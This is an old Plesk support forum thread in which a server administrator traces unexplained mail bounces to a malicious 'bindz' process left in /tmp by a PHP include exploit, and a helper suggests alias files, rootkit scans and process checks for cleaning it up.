1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Strange mail behavior

Discussion in 'Plesk for Linux - 8.x and Older' started by NightMan, Jul 7, 2005.

  1. NightMan

    NightMan Guest

    0
     
    I am testing a php script, which is sending a mail to my self, but when I tried today, it was sending a mail to me, but it was sending a bounce as well. The mail bounce was generated from a unknown mail ID. How this can happen?

    I have checked the PSA data base and search for the mail ID in all tables, but found none.

    which file in the server include alises or groupe mail options?

    SERVER : LINUX RHE/PSA 7.5.x
     
  2. jamesyeeoc

    jamesyeeoc Guest

    0
     
    For aliases, check:

    /etc/aliases

    /etc/mail/aliases

    Not sure about group mail
     
  3. NightMan

    NightMan Guest

    0
     
    these files or folders not exist..
     
  4. jamesyeeoc

    jamesyeeoc Guest

    0
     
    Ok, check for these:

    /var/qmail/alias
    /var/qmail/alias/.qmail-mailer-daemon
    /var/qmail/alias/.qmail-postmaster
    /var/qmail/alias/.qmail-root

    (or similar named)
     
  5. jamesyeeoc

    jamesyeeoc Guest

    0
     
    ****, I gotta stop doing simultaneous checking/posting to so many support boards (doing 4 sites right now). Hard to keep things straight on no sleep and so many forum posts.. sorry

    Plesk also has the following:
    mySQL database: psa, table: mail_aliases
     
  6. NightMan

    NightMan Guest

    0
     
    :) thanks. but the bounced mail ID is not in any of these files, just wondering... any suggestions?
     
  7. jamesyeeoc

    jamesyeeoc Guest

    0
     
    I cross posted, please see my post (above) regarding mySQL database

    What is the bounced mail ID name?

    And have you checked the contents of the php.ini file?
     
  8. NightMan

    NightMan Guest

    0
     
    Hi. This is the qmail-send program at myserver.com.
    I'm afraid I wasn't able to deliver your message to the following addresses.
    This is a permanent error; I've given up. Sorry it didn't work out.

    <DonnebowlsT@softhome.net>:
    66.54.152.4 does not like recipient.
    Remote host said: 550 passing these spams on just makes it worse
    Giving up on 66.54.152.4.

    --- Below this line is a copy of the message.

    I already checked the PSA database, the mail id is not there in that table or any other table.

    PHP.INI does not have the mail ID mentioned in any place
     
  9. jamesyeeoc

    jamesyeeoc Guest

    0
     
    Just trying to get a better feel for things:

    Q1: Have you *ever* dealt with softhome.net on this server? Or is that your domain?? (I figure it's not yours)

    Q2: Is that your IP? (I figure it's not yours)

    Q3: If it's your domain or IP, what software do you have which might generate that 550 message? (probably not your box)

    Q4: Have you run rootkit scans lately (with latest updates for RKHunter and Chkrootkit)

    Q5: Have you checked /tmp and /var/tmp for any funny files (exploited script)?

    I know these are standard questions, but it is possible you may have been breached coincidentally at the same time.
     
  10. NightMan

    NightMan Guest

    0
     
    Q1: Have you *ever* dealt with softhome.net on this server? Or is that your domain?? (I figure it's not yours)
    #No, never
    Q2: Is that your IP? (I figure it's not yours)
    #NOT mine
    Q3: If it's your domain or IP, what software do you have which might generate that 550 message? (probably not your box)
    #not from my box
    Q4: Have you run rootkit scans lately (with latest updates for RKHunter and Chkrootkit)
    #yes, no issues found..
    Q5: Have you checked /tmp and /var/tmp for any funny files (exploited script)?
    # I found a filed called bindz in /tmp folder and removed it, checked for any exploits, but not able to find any other tracks.
    compiler was already disabled. the file been downloaded using a php include exploite..
     
  11. jamesyeeoc

    jamesyeeoc Guest

    0
     
    The filename 'bindz' might indicate a Bind/named redirector of some sort (grasping at air).

    After deleting the file, have you also checked the process list (ps -ax) and see if there are any funny processes running currently?
     
  12. NightMan

    NightMan Guest

    0
     
    yes. I did find the bindz was running, So I killed that.
    the mail also been received before I got it removed.
     
  13. jamesyeeoc

    jamesyeeoc Guest

    0
     
    Just PM'd you this:

    Other forums have reported same file found, script kiddie started out by exploiting exim systems.

    http://www.webhostingtalk.com/archive/thread/407726-1.html
    http://www.webhostingtalk.com/archive/thread/394689-1.html
    http://lists.indymedia.org/pipermail/imc-tech/2005-May/0503-d1.html
    http://forum.ev1servers.net/showthread.php?t=54849

    One of these threads makes reference to additional files to check for. I just skimmed them (too tired to focus eyes), good luck in getting it cleaned up. (love your signature line)
     
  14. NightMan

    NightMan Guest

    0
     
    Yes. got your pm. Thanks for the links, I already checked the google, but not able to find any useful info.
     
  15. jamesyeeoc

    jamesyeeoc Guest

    0
     
    I found those by googling "bindz +script"

    Sun come up, eyelids go down. Nighty night, Nightman....
     
Loading...